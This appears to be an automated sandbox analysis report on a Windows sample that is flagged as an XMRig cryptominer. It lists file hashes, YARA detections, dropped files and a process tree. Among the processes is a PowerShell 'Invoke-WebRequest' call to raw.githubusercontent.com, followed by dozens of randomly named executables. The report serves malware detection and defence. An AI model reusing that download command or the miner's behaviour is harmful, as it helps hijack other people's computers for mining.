Analysis
-
max time kernel
18s -
max time network
17s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
01-05-2024 04:56
Behavioral task
behavioral1
Sample
0b199f8a76cb31a7386a9b6f72d08708_JaffaCakes118.exe
Resource
win7-20240221-en
Errors
General
-
Target
0b199f8a76cb31a7386a9b6f72d08708_JaffaCakes118.exe
-
Size
2.2MB
-
MD5
0b199f8a76cb31a7386a9b6f72d08708
-
SHA1
def2dd7ae74212dc9db383479f97e7fe4337a9d3
-
SHA256
e8318951c19fec622a0aaf8a4d1ae04e2d2bbb45613a10b1e59ba727f9ffa557
-
SHA512
1d23d2f0db922d5bd088971d748d4c2607a9387aac137ef3d891b0444b39fa94032fab094cc7b865ffdb50129558122893a525a605d0a2992c10c7c46e0ef72c
-
SSDEEP
49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82g1VQx7Va4qrjx:NABo
Malware Config
Signatures
-
XMRig Miner payload 5 IoCs
resource yara_rule behavioral2/memory/884-99-0x00007FF609FD0000-0x00007FF60A3C2000-memory.dmp xmrig behavioral2/memory/1968-156-0x00007FF721DB0000-0x00007FF7221A2000-memory.dmp xmrig behavioral2/memory/2652-228-0x00007FF600520000-0x00007FF600912000-memory.dmp xmrig behavioral2/memory/3084-308-0x00007FF780490000-0x00007FF780882000-memory.dmp xmrig behavioral2/memory/1696-339-0x00007FF7B1A90000-0x00007FF7B1E82000-memory.dmp xmrig -
resource yara_rule behavioral2/memory/4164-0-0x00007FF78FF50000-0x00007FF790342000-memory.dmp upx behavioral2/files/0x000d0000000233cb-6.dat upx behavioral2/files/0x000700000002341e-8.dat upx behavioral2/files/0x0007000000023421-31.dat upx behavioral2/memory/884-99-0x00007FF609FD0000-0x00007FF60A3C2000-memory.dmp upx behavioral2/memory/1968-156-0x00007FF721DB0000-0x00007FF7221A2000-memory.dmp upx behavioral2/files/0x0007000000023425-159.dat upx behavioral2/memory/2652-228-0x00007FF600520000-0x00007FF600912000-memory.dmp upx behavioral2/memory/3084-308-0x00007FF780490000-0x00007FF780882000-memory.dmp upx behavioral2/memory/1696-339-0x00007FF7B1A90000-0x00007FF7B1E82000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 raw.githubusercontent.com 3 raw.githubusercontent.com
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "1⤵PID:4648
-
C:\Windows\System\LcHoFnM.exeC:\Windows\System\LcHoFnM.exe1⤵PID:1412
-
C:\Windows\System\XmJAxNP.exeC:\Windows\System\XmJAxNP.exe1⤵PID:884
-
C:\Windows\System\lCNIumi.exeC:\Windows\System\lCNIumi.exe1⤵PID:3788
-
C:\Windows\System\pQKyJIi.exeC:\Windows\System\pQKyJIi.exe1⤵PID:1968
-
C:\Windows\System\kzhdxMZ.exeC:\Windows\System\kzhdxMZ.exe1⤵PID:4692
-
C:\Windows\System\ZqhTLKq.exeC:\Windows\System\ZqhTLKq.exe1⤵PID:60
-
C:\Windows\System\UzYZStK.exeC:\Windows\System\UzYZStK.exe1⤵PID:3496
-
C:\Windows\System\tAiRhnx.exeC:\Windows\System\tAiRhnx.exe1⤵PID:5248
-
C:\Windows\System\bQShyEd.exeC:\Windows\System\bQShyEd.exe1⤵PID:5352
-
C:\Windows\System\bQPROjD.exeC:\Windows\System\bQPROjD.exe1⤵PID:5848
-
C:\Windows\System\KMDQCCF.exeC:\Windows\System\KMDQCCF.exe1⤵PID:6048
-
C:\Windows\System\tVLgDJR.exeC:\Windows\System\tVLgDJR.exe1⤵PID:6068
-
C:\Windows\System\TGdbEeE.exeC:\Windows\System\TGdbEeE.exe1⤵PID:2176
-
C:\Windows\System\asvqaVT.exeC:\Windows\System\asvqaVT.exe1⤵PID:5164
-
C:\Windows\System\JcDpnTd.exeC:\Windows\System\JcDpnTd.exe1⤵PID:5320
-
C:\Windows\System\kcHzAeW.exeC:\Windows\System\kcHzAeW.exe1⤵PID:5696
-
C:\Windows\System\gVEIGJz.exeC:\Windows\System\gVEIGJz.exe1⤵PID:5752
-
C:\Windows\System\GGKwADs.exeC:\Windows\System\GGKwADs.exe1⤵PID:5792
-
C:\Windows\System\VnCBvKc.exeC:\Windows\System\VnCBvKc.exe1⤵PID:5840
-
C:\Windows\System\fAIahax.exeC:\Windows\System\fAIahax.exe1⤵PID:6140
-
C:\Windows\System\rmnKBHh.exeC:\Windows\System\rmnKBHh.exe1⤵PID:5576
-
C:\Windows\System\WsGfIJc.exeC:\Windows\System\WsGfIJc.exe1⤵PID:5524
-
C:\Windows\System\MHyTuch.exeC:\Windows\System\MHyTuch.exe1⤵PID:6268
-
C:\Windows\System\SDSLBfS.exeC:\Windows\System\SDSLBfS.exe1⤵PID:6536
-
C:\Windows\System\wcrMcUw.exeC:\Windows\System\wcrMcUw.exe1⤵PID:6552
-
C:\Windows\System\hIWdCLO.exeC:\Windows\System\hIWdCLO.exe1⤵PID:6792
-
C:\Windows\System\jfWwoix.exeC:\Windows\System\jfWwoix.exe1⤵PID:7048
-
C:\Windows\System\LYQHzWF.exeC:\Windows\System\LYQHzWF.exe1⤵PID:7064
-
C:\Windows\System\xdVBnMB.exeC:\Windows\System\xdVBnMB.exe1⤵PID:5748
-
C:\Windows\System\dUADNWJ.exeC:\Windows\System\dUADNWJ.exe1⤵PID:6804
-
C:\Windows\System\vFzcJan.exeC:\Windows\System\vFzcJan.exe1⤵PID:6628
-
C:\Windows\System\sZxHkcD.exeC:\Windows\System\sZxHkcD.exe1⤵PID:6956
-
C:\Windows\System\aLzNhpW.exeC:\Windows\System\aLzNhpW.exe1⤵PID:7128
-
C:\Windows\System\qWdAtGH.exeC:\Windows\System\qWdAtGH.exe1⤵PID:6456
-
C:\Windows\System\OxPtJyD.exeC:\Windows\System\OxPtJyD.exe1⤵PID:6472
-
C:\Windows\System\AjypFcQ.exeC:\Windows\System\AjypFcQ.exe1⤵PID:6452
-
C:\Windows\System\oRDFzXE.exeC:\Windows\System\oRDFzXE.exe1⤵PID:6720
-
C:\Windows\System\BolTKFb.exeC:\Windows\System\BolTKFb.exe1⤵PID:4632
-
C:\Windows\System\iHTlKjJ.exeC:\Windows\System\iHTlKjJ.exe1⤵PID:6500
-
C:\Windows\System\GvlrbIc.exeC:\Windows\System\GvlrbIc.exe1⤵PID:3116
-
C:\Windows\System\BrXOsJG.exeC:\Windows\System\BrXOsJG.exe1⤵PID:6528
-
C:\Windows\System\fOEvfNi.exeC:\Windows\System\fOEvfNi.exe1⤵PID:428
-
C:\Windows\System\YSfLflY.exeC:\Windows\System\YSfLflY.exe1⤵PID:7216
-
C:\Windows\System\SwGKCbG.exeC:\Windows\System\SwGKCbG.exe1⤵PID:7268
-
C:\Windows\System\rFhSpge.exeC:\Windows\System\rFhSpge.exe1⤵PID:7352
-
C:\Windows\System\cXHKSEV.exeC:\Windows\System\cXHKSEV.exe1⤵PID:7540
-
C:\Windows\System\NHFzTaL.exeC:\Windows\System\NHFzTaL.exe1⤵PID:7768
-
C:\Windows\System\UBONvNs.exeC:\Windows\System\UBONvNs.exe1⤵PID:8008
-
C:\Windows\System\HuVjRIn.exeC:\Windows\System\HuVjRIn.exe1⤵PID:5116
-
C:\Windows\System\CQuHPVD.exeC:\Windows\System\CQuHPVD.exe1⤵PID:7796
-
C:\Windows\System\ikGiyno.exeC:\Windows\System\ikGiyno.exe1⤵PID:7700
-
C:\Windows\System\dRzRRiR.exeC:\Windows\System\dRzRRiR.exe1⤵PID:8596
-
C:\Windows\System\CJQAPgq.exeC:\Windows\System\CJQAPgq.exe1⤵PID:8616
-
C:\Windows\System\TocwPnL.exeC:\Windows\System\TocwPnL.exe1⤵PID:9040
-
C:\Windows\System\bgxxBDc.exeC:\Windows\System\bgxxBDc.exe1⤵PID:9064
-
C:\Windows\System\yVSRFlX.exeC:\Windows\System\yVSRFlX.exe1⤵PID:9624
-
C:\Windows\System\NfHbQIl.exeC:\Windows\System\NfHbQIl.exe1⤵PID:10100
-
C:\Windows\System\DURddwJ.exeC:\Windows\System\DURddwJ.exe1⤵PID:9500
-
C:\Windows\System\eHUUerS.exeC:\Windows\System\eHUUerS.exe1⤵PID:9592
-
C:\Windows\System\envGYKN.exeC:\Windows\System\envGYKN.exe1⤵PID:11136
-
C:\Windows\System\RqCzORQ.exeC:\Windows\System\RqCzORQ.exe1⤵PID:10232
-
C:\Windows\System\wpAMxLr.exeC:\Windows\System\wpAMxLr.exe1⤵PID:9136
-
C:\Windows\System\lmBwTmP.exeC:\Windows\System\lmBwTmP.exe1⤵PID:12072
-
C:\Windows\System\ulYcxZz.exeC:\Windows\System\ulYcxZz.exe1⤵PID:12932
-
C:\Windows\System\PNwGNwA.exeC:\Windows\System\PNwGNwA.exe1⤵PID:11940
-
C:\Windows\System\QVxPcYm.exeC:\Windows\System\QVxPcYm.exe1⤵PID:3264
-
C:\Windows\System\HtdYGTV.exeC:\Windows\System\HtdYGTV.exe1⤵PID:10220
-
C:\Windows\System\OLzQjxX.exeC:\Windows\System\OLzQjxX.exe1⤵PID:9716
-
C:\Windows\System\IjxQUhv.exeC:\Windows\System\IjxQUhv.exe1⤵PID:10588
-
C:\Windows\System\swaQNla.exeC:\Windows\System\swaQNla.exe1⤵PID:13220
-
C:\Windows\System\YAByOkR.exeC:\Windows\System\YAByOkR.exe1⤵PID:3252
-
C:\Windows\System\FkRSBJz.exeC:\Windows\System\FkRSBJz.exe1⤵PID:9632
-
C:\Windows\System\DcCvzzU.exeC:\Windows\System\DcCvzzU.exe1⤵PID:11932
-
C:\Windows\System\zXBZizh.exeC:\Windows\System\zXBZizh.exe1⤵PID:12688
-
C:\Windows\System\zeRnbuj.exeC:\Windows\System\zeRnbuj.exe1⤵PID:12428
-
C:\Windows\System\DYNOgOW.exeC:\Windows\System\DYNOgOW.exe1⤵PID:11488
-
C:\Windows\System\XdoYyCP.exeC:\Windows\System\XdoYyCP.exe1⤵PID:10020
-
C:\Windows\System\KqQjkep.exeC:\Windows\System\KqQjkep.exe1⤵PID:12764
-
C:\Windows\System\CNWzlnj.exeC:\Windows\System\CNWzlnj.exe1⤵PID:11328
-
C:\Windows\System\lwcZgDv.exeC:\Windows\System\lwcZgDv.exe1⤵PID:3596
-
C:\Windows\System\VkQwwdC.exeC:\Windows\System\VkQwwdC.exe1⤵PID:5444
-
C:\Windows\System\apqGiCq.exeC:\Windows\System\apqGiCq.exe1⤵PID:3620
-
C:\Windows\System\ZptWtkp.exeC:\Windows\System\ZptWtkp.exe1⤵PID:2812
-
C:\Windows\System\GXuPPks.exeC:\Windows\System\GXuPPks.exe1⤵PID:11324
-
C:\Windows\System\gFQYoUk.exeC:\Windows\System\gFQYoUk.exe1⤵PID:12240
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.2MB
MD51e56931a5adbd8aa9e5fafe36063c0bf
SHA188feca5a32be2781e8e78115f578c9159e05df67
SHA256e15143cc381c0f5d05e84bd34bfc7a4d05fe71a4461ddcc60646c9136d29d8d5
SHA5126a7c0994f98d9535bf025368fb9239260da15307889772202fb069fe5b9ece124cf151fdf62ee74715e1a9e5e1d0b60223720e2d4b1ec022fcfc3b4ad77fe7db
-
Filesize
2.2MB
MD5e6efe60eda9b8eb570e488ff0f697c9b
SHA1dcdd2d619ad6bf28ee94e9185c71a0d439e830bd
SHA256e16b1de36060f8876366838839868a9f4fc1c84cc46a12ef684dd19307974530
SHA512d41e9763c45411b3d030d5be834a11326d3e1b49f9a5ebb6d1ab856981db11ef63824297d166ee311488fd7558e5ea10ee6f33de8091d12f3f8faef1d01067f3
-
Filesize
2.2MB
MD5f2ddbcc9e7d4d31c95053c090bcea573
SHA1950ac47411a08d6f5861434bd0dacf942e9a416a
SHA256c193568cc5d62e71762a00fe9f89c783f8ea05b35f986abf08fc38e093ed4282
SHA512374b94c49d353c20f70c557c5935269aeca34b847cfc6642e43b5825856db62fe1cdeb4e7f2fee1c39a2767c1839ab98fe994abf3ae1ca903a107d5038db4131
-
Filesize
2.2MB
MD5bfc7dd4f377eba6326584f21c70228a8
SHA18c083fc4e73bc7d9f53f833814c51b29c6cd7963
SHA256a90e0e2997ee0574457fd17e4882ee2c3652618a15b7ad9f69fa2796ea109829
SHA51248ede10c6c32f845adaea9b3b8d513e6101fb99483ea927b7de4be3e65cb70412cc0d5a850802e44ad86aac850ec15f6fd905396b5158a09f922198627bf7fd8